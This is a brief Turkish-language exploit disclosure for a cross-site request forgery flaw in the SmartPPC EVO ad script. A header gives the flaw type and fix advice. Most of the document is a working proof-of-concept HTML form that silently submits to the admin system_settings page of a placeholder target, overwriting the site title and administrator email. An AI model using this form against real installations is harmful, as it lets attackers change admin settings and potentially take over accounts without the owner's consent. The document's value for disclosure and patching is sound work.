< ------------------- header data start ------------------- >

#############################################################

# Application Name : SmartPPC EVO

# vulnerable Type : XSRF

# Infection : Yönlendirme Kodu Atilabilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli,Eski sifre sorulmalidir ..

# Demo : http://orbitscripts.com/products/smartppc/evo/admin/system_settings

# author : CWCaspeR ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >


<form name=system_settings method=post action=http://hedefsite.com/scriptyolu/admin/system_settings>
<div class=frame p10 mb10>
<input type=hidden id=st name=title class=text w200 value=Yonlendirme Kodu>
<input type=hidden id=am name=mail class=text w200 value=[email protected]>
<input type=hidden id=as name=signup value=true checked/>
<button class=button w200 title=Save onclick=document.system_settings.submit();>
<span class=ico ico-confirm>Buton Adi</span>
</button>
<input type=hidden name=id value=1/>
<input type=hidden name=form_mode value=save/>
<input type=hidden name=active_form value=system_settings/>
</form>


< -- bug code end of -- >